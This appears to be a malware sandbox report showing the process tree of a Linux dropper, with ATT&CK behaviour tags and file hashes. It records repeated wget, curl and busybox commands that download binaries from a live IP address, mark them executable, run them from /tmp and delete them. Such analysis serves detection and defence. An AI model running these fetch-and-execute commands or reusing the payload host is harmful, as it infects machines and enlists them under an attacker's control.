/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:924
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:926
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:932
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:938
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:941
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:942
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:944
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:947
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:948
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:950
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:953
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:954
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:956
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:959
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:962
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:964
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:966
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:968
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:971
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:972
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:974
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:977
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:978
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:980
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97